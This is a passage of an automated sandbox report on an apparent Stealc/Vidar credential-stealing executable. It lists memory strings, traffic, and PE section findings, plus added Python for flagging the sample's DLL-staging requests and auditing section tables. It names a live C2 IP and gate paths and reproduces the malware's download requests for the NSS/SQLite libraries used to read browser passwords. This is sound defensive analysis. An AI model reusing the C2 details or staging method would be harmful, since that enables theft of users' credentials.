Source: random(1).exe, 00000000.00000002.2013235084.000000000089E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.115y
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: chromecache_168.3.dr String found in binary or memory: http://www.broofa.com
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: random(1).exe, 00000000.00000002.2028941439.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: random(1).exe, 00000000.00000002.2018694881.0000000005672000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2028492455.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: random(1).exe, 00000000.00000003.1903283818.0000000000970000.00000004.00000020.00020000.00000000.sdmp, IIDAAFBG.0.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chromecache_166.3.dr String found in binary or memory: https://accounts.google.com/o/oauth2/auth
Source: chromecache_166.3.dr String found in binary or memory: https://accounts.google.com/o/oauth2/postmessageRelay
Source: chromecache_168.3.dr, chromecache_166.3.dr String found in binary or memory: https://apis.google.com
Source: random(1).exe, 00000000.00000002.2025447897.000000000B6A2000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2013235084.0000000000951000.00000004.00000020.00020000.00000000.sdmp, IIDAAFBGDBKJJJKFIIIJ.0.dr String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: random(1).exe, 00000000.00000002.2025447897.000000000B6A2000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2013235084.0000000000951000.00000004.00000020.00020000.00000000.sdmp, IIDAAFBGDBKJJJKFIIIJ.0.dr String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: random(1).exe, 00000000.00000003.1903283818.0000000000970000.00000004.00000020.00020000.00000000.sdmp, IIDAAFBG.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: random(1).exe, 00000000.00000003.1903283818.0000000000970000.00000004.00000020.00020000.00000000.sdmp, IIDAAFBG.0.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: random(1).exe, 00000000.00000003.1903283818.0000000000970000.00000004.00000020.00020000.00000000.sdmp, IIDAAFBG.0.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chromecache_166.3.dr String found in binary or memory: https://clients6.google.com
Source: chromecache_166.3.dr String found in binary or memory: https://content.googleapis.com
Source: random(1).exe, 00000000.00000002.2025447897.000000000B6A2000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2013235084.0000000000951000.00000004.00000020.00020000.00000000.sdmp, IIDAAFBGDBKJJJKFIIIJ.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: random(1).exe, 00000000.00000002.2025447897.000000000B6A2000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2013235084.0000000000951000.00000004.00000020.00020000.00000000.sdmp, IIDAAFBGDBKJJJKFIIIJ.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: chromecache_166.3.dr String found in binary or memory: https://domains.google.com/suggest/flow
Source: random(1).exe, 00000000.00000003.1903283818.0000000000970000.00000004.00000020.00020000.00000000.sdmp, IIDAAFBG.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: random(1).exe, 00000000.00000003.1903283818.0000000000970000.00000004.00000020.00020000.00000000.sdmp, IIDAAFBG.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: random(1).exe, 00000000.00000003.1903283818.0000000000970000.00000004.00000020.00020000.00000000.sdmp, IIDAAFBG.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: chromecache_168.3.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey200-36dp/2x/gm_alert_gm_grey200_3
Source: chromecache_168.3.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey600-36dp/2x/gm_alert_gm_grey600_3
Source: chromecache_168.3.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey200-24dp/1x/gm_close_gm_grey200_2
Source: chromecache_168.3.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey600-24dp/1x/gm_close_gm_grey600_2
Source: IIDAAFBGDBKJJJKFIIIJ.0.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://mozilla.org0/
Source: chromecache_168.3.dr String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: chromecache_166.3.dr String found in binary or memory: https://plus.google.com
Source: chromecache_166.3.dr String found in binary or memory: https://plus.googleapis.com
Source: ECAKKKKJDBKKFIEBKEHDGCAFCB.0.dr String found in binary or memory: https://support.mozilla.org
Source: ECAKKKKJDBKKFIEBKEHDGCAFCB.0.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: ECAKKKKJDBKKFIEBKEHDGCAFCB.0.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: random(1).exe, 00000000.00000002.2013442010.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp, random(1).exe, 00000000.00000003.1895386152.000000000556E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: random(1).exe, 00000000.00000002.2013442010.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe
Source: random(1).exe, 00000000.00000002.2013442010.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp, random(1).exe, 00000000.00000003.1895386152.000000000556E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: random(1).exe, 00000000.00000002.2013442010.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe
Source: chromecache_166.3.dr String found in binary or memory: https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1
Source: random(1).exe, 00000000.00000002.2025447897.000000000B6A2000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2013235084.0000000000951000.00000004.00000020.00020000.00000000.sdmp, IIDAAFBGDBKJJJKFIIIJ.0.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: random(1).exe, 00000000.00000003.1903283818.0000000000970000.00000004.00000020.00020000.00000000.sdmp, IIDAAFBG.0.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: random(1).exe, 00000000.00000002.2025447897.000000000B6A2000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2013235084.0000000000951000.00000004.00000020.00020000.00000000.sdmp, IIDAAFBGDBKJJJKFIIIJ.0.dr String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: random(1).exe, 00000000.00000003.1903283818.0000000000970000.00000004.00000020.00020000.00000000.sdmp, IIDAAFBG.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chromecache_166.3.dr String found in binary or memory: https://www.googleapis.com/auth/plus.me
Source: chromecache_166.3.dr String found in binary or memory: https://www.googleapis.com/auth/plus.people.recommended
Source: chromecache_168.3.dr String found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
Source: chromecache_168.3.dr String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
Source: chromecache_168.3.dr String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css
Source: ECAKKKKJDBKKFIEBKEHDGCAFCB.0.dr String found in binary or memory: https://www.mozilla.org
Source: random(1).exe, 00000000.00000002.2013442010.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: random(1).exe, 00000000.00000002.2013442010.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/----JKECGHCFIJDAAKFHJJDHst.exe
Source: random(1).exe, 00000000.00000002.2013442010.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/BAKFCAAKFCFC
Source: ECAKKKKJDBKKFIEBKEHDGCAFCB.0.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: random(1).exe, 00000000.00000002.2013442010.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: random(1).exe, 00000000.00000002.2013442010.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/1xHb29nbGUgQ2hyb21lXy50eHQ=host.exe
Source: ECAKKKKJDBKKFIEBKEHDGCAFCB.0.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: random(1).exe, 00000000.00000002.2013442010.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: random(1).exe, 00000000.00000003.1982796865.000000000B8E0000.00000004.00000020.00020000.00000000.sdmp, ECAKKKKJDBKKFIEBKEHDGCAFCB.0.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: ECAKKKKJDBKKFIEBKEHDGCAFCB.0.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: random(1).exe, 00000000.00000002.2013442010.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: random(1).exe, 00000000.00000002.2013442010.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/eads:
Source: random(1).exe, 00000000.00000003.1982796865.000000000B8E0000.00000004.00000020.00020000.00000000.sdmp, ECAKKKKJDBKKFIEBKEHDGCAFCB.0.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: random(1).exe, 00000000.00000002.2013442010.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.4:49837 version: TLS 1.2
Source: unknown HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.4:49835 version: TLS 1.2
Source: unknown HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.4:49839 version: TLS 1.2
Source: unknown HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.4:49841 version: TLS 1.2
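
The C2 traffic above (a bare GET / to 185.215.113.115, then seven DLLs from /68b591d6548ec281/, with the /c4becf79229cb002.php gate recovered only from memory strings) is the staging step in which Stealc/Vidar fetch the NSS libraries (freebl3, mozglue, nss3, softokn3) and sqlite3 used to read Firefox and Chromium credential stores, plus the MSVC runtime those libraries need. The following Python is an added example written for this page, not code from the sandbox report or from the malware: it parses raw HTTP requests, flags the staging pattern visible above (IP-literal Host, known support DLL, no User-Agent header) and collapses the noisy memory strings into a clean IOC set. The sample requests and memory strings are constructed from the records above; the hex-token URL shape encoded in C2_URL_RE is an assumption generalised from this one report, not a family-wide constant, and bare-host strings such as http://185.215.113.115/ are deliberately left out because the gate and staging paths are the actionable indicators.

```python
import ipaddress
import re
from dataclasses import dataclass
from typing import Dict, List, Set

# Support DLLs Stealc/Vidar fetch from the C2 to read browser credential
# stores (NSS for Firefox, SQLite for Chromium). Names taken from the GET
# requests in the report above.
STAGED_DLLS = {
    "sqlite3.dll", "freebl3.dll", "mozglue.dll", "nss3.dll",
    "softokn3.dll", "msvcp140.dll", "vcruntime140.dll",
}

# Assumed shape of the C2 paths seen in this report: a hex-token directory
# holding the DLLs and a hex-token .php gate on a bare IPv4 host. Whatever
# follows the match is memory noise and is dropped.
C2_URL_RE = re.compile(
    r"https?://\d{1,3}(?:\.\d{1,3}){3}/"
    r"(?:[0-9a-f]{8,}\.php|[0-9a-f]{8,}/[A-Za-z0-9_]+\.dll)"
)


@dataclass
class HttpRequest:
    method: str
    path: str
    version: str
    headers: Dict[str, str]   # header names lower-cased


def parse_http_request(raw: str) -> HttpRequest:
    """Parse a raw HTTP/1.x request (request line plus header block)."""
    lines = raw.replace("\r\n", "\n").strip("\n").split("\n")
    method, path, version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if not line.strip():          # blank line ends the header block
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, path, version, headers)


def is_ip_literal(host: str) -> bool:
    """True when the Host header is a bare IPv4 address, with or without a port."""
    try:
        ipaddress.IPv4Address(host.split(":")[0])
        return True
    except ValueError:
        return False


def classify_request(req: HttpRequest) -> List[str]:
    """Reasons a request matches the staging pattern seen in this report."""
    filename = req.path.split("?")[0].rsplit("/", 1)[-1].lower()
    reasons: List[str] = []
    if is_ip_literal(req.headers.get("host", "")):
        reasons.append("host is an IP literal")
    if filename in STAGED_DLLS:
        reasons.append("fetches NSS/SQLite support DLL")
    if "user-agent" not in req.headers:
        reasons.append("no User-Agent header")
    return reasons


def is_staging_fetch(req: HttpRequest) -> bool:
    """All three indicators together: the DLL downloads seen above."""
    return len(classify_request(req)) == 3


def extract_c2_urls(memory_strings: List[str]) -> Set[str]:
    """Collapse noisy memory strings into a clean, deduplicated IOC set."""
    found: Set[str] = set()
    for s in memory_strings:
        m = C2_URL_RE.match(s)
        if m:
            found.add(m.group(0))
    return found


# Constructed sample records modelled on the report above.
SAMPLE_REQUESTS = [
    "GET / HTTP/1.1\r\nHost: 185.215.113.115\r\nConnection: Keep-Alive\r\n"
    "Cache-Control: no-cache\r\n\r\n",
    "GET /68b591d6548ec281/nss3.dll HTTP/1.1\r\nHost: 185.215.113.115\r\n"
    "Cache-Control: no-cache\r\n\r\n",
    "GET /th?id=OADD2.1&pid=21.2 HTTP/1.1\r\nAccept: */*\r\n"
    "User-Agent: Mozilla/5.0\r\nHost: tse1.mm.bing.net\r\n"
    "Connection: Keep-Alive\r\n\r\n",
]
SAMPLE_MEMORY_STRINGS = [
    "http://185.215.113.115/68b591d6548ec281/freebl3.dllbN",
    "http://185.215.113.115/68b591d6548ec281/vcruntime140.dlls",
    "http://185.215.113.115/c4becf79229cb002.phpAAFBGDBKJJJKFIIIJ",
    "http://185.215.113.115/c4becf79229cb002.php",
    "http://185.215.113.115c4becf79229cb002.phpser",   # missing slash: noise
    "http://185.215.113.115y",
]

if __name__ == "__main__":
    for req in map(parse_http_request, SAMPLE_REQUESTS):
        tag = "STAGING" if is_staging_fetch(req) else "-------"
        print(f"{tag} {req.path:34} {', '.join(classify_request(req))}")
    print("C2 IOCs:")
    for url in sorted(extract_c2_urls(SAMPLE_MEMORY_STRINGS)):
        print("  " + url)
```

The three-indicator rule is deliberately conservative: the initial GET / check-in scores only two (IP-literal host, no User-Agent) and the bing image fetches score none, so only the DLL pulls are reported as staging. Feed parse_http_request the request text from a proxy or NIDS capture, and extract_c2_urls the "String found in binary or memory" values from a report like this one, to get the same split on real data.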

System Summary

barindex
Source: random(1).exe Static PE information: section name:
Source: random(1).exe Static PE information: section name: .idata
Source: random(1).exe Static PE information: section name:
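
The two blank section names above are names the report could not print: the sample carries sections whose names consist of special or non-printable characters (the "PE file contains section with special chars" signature), and a separate signature records that it changes section rights at run time while unpacking. The following Python is an added example written for this page, not the sandbox's own check and not a parse of the analysed sample: a minimal section-table reader that flags non-printable names, sections that are both writable and executable, and executable sections with no data on disk. It runs on a constructed PE32 header built inside the block (build_sample_pe and the "special-chars", "write+execute" and "no-raw-data" labels are the example's own); the flag constants and header layout are from the PE/COFF specification.

```python
import struct
from dataclasses import dataclass
from typing import List, Tuple

# IMAGE_SECTION_HEADER characteristics flags (PE/COFF specification).
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_CNT_UNINITIALIZED_DATA = 0x00000080
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

# Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData,
# PointerToRelocations, PointerToLinenumbers, NumberOfRelocations,
# NumberOfLinenumbers, Characteristics: 40 bytes per section header.
SECTION_FMT = "<8sIIIIIIHHI"


def _is_clean_name(raw: bytes) -> bool:
    """A conventional section name: non-empty, printable ASCII, no spaces."""
    return bool(raw) and all(0x21 <= b <= 0x7E for b in raw)


@dataclass
class Section:
    name_raw: bytes
    virtual_size: int
    raw_size: int
    characteristics: int

    @property
    def name(self) -> str:
        """Printable name, or the raw bytes as hex when the name is not clean."""
        raw = self.name_raw.rstrip(b"\0")
        return raw.decode("ascii") if _is_clean_name(raw) else (raw.hex() or "<empty>")


def parse_sections(data: bytes) -> List[Section]:
    """Follow DOS header -> PE signature -> COFF header to the section table."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: missing PE signature")
    n_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_size      # 4-byte signature + 20-byte COFF header
    sections: List[Section] = []
    for i in range(n_sections):
        f = struct.unpack_from(SECTION_FMT, data, table + i * 40)
        sections.append(Section(name_raw=f[0], virtual_size=f[1],
                                raw_size=f[3], characteristics=f[9]))
    return sections


def audit_sections(sections: List[Section]) -> List[Tuple[str, str]]:
    """(section, finding) pairs for the static heuristics behind the report's flags."""
    findings: List[Tuple[str, str]] = []
    for s in sections:
        if not _is_clean_name(s.name_raw.rstrip(b"\0")):
            findings.append((s.name, "special-chars"))
        if s.characteristics & IMAGE_SCN_MEM_WRITE and s.characteristics & IMAGE_SCN_MEM_EXECUTE:
            findings.append((s.name, "write+execute"))
        if s.raw_size == 0 and s.virtual_size and s.characteristics & IMAGE_SCN_MEM_EXECUTE:
            findings.append((s.name, "no-raw-data"))   # filled at run time by an unpacker
    return findings


def build_sample_pe(sections: List[Tuple[bytes, int, int, int]]) -> bytes:
    """Constructed minimal PE32 header for (name, virtual size, raw size, flags).
    Only the fields parse_sections reads are meaningful; everything else is zero."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    optional = struct.pack("<H", 0x10B) + b"\0" * 222      # PE32 magic, 224 bytes
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, len(optional), 0x0102)
    table = b"".join(
        struct.pack(SECTION_FMT, name, vsize, 0x1000 * (i + 1), rsize,
                    0x400 * (i + 1), 0, 0, 0, 0, flags)
        for i, (name, vsize, rsize, flags) in enumerate(sections)
    )
    return dos + b"PE\0\0" + coff + optional + table


# Constructed sample: a normal .text and .idata, a section with a non-printable
# name that is also RWX, and an RWX section with no data on disk.
RX = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ
RWX = RX | IMAGE_SCN_MEM_WRITE
SAMPLE_PE = build_sample_pe([
    (b".text", 0x2000, 0x2000, IMAGE_SCN_CNT_CODE | RX),
    (b".idata", 0x0200, 0x0200, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ),
    (b"\x01\x9f\xe3", 0x5000, 0x5000, IMAGE_SCN_CNT_CODE | RWX),
    (b".text0", 0x8000, 0x0000, IMAGE_SCN_CNT_UNINITIALIZED_DATA | RWX),
])

if __name__ == "__main__":
    for name, finding in audit_sections(parse_sections(SAMPLE_PE)):
        print(f"{name:10} {finding}")
```

To run this against a real file, pass open(path, "rb").read() to parse_sections; only the headers are read. Printing unclean names as hex rather than as raw bytes is what keeps a triage log readable, which is exactly the problem the blank names in the report above illustrate. Note that the static W+X check is a proxy: the sandbox's "changes PE section rights" signature comes from watching protection changes at run time, so a packer that starts with read-only code and calls VirtualProtect later will pass this static check and still trip the dynamic one.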
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C6B62C0 PR_dtoa,PR_GetCurrentThread,strlen,NtFlushVirtualMemory,PR_GetCurrentThread,memcpy,memcpy, 0_2_6C6B62C0
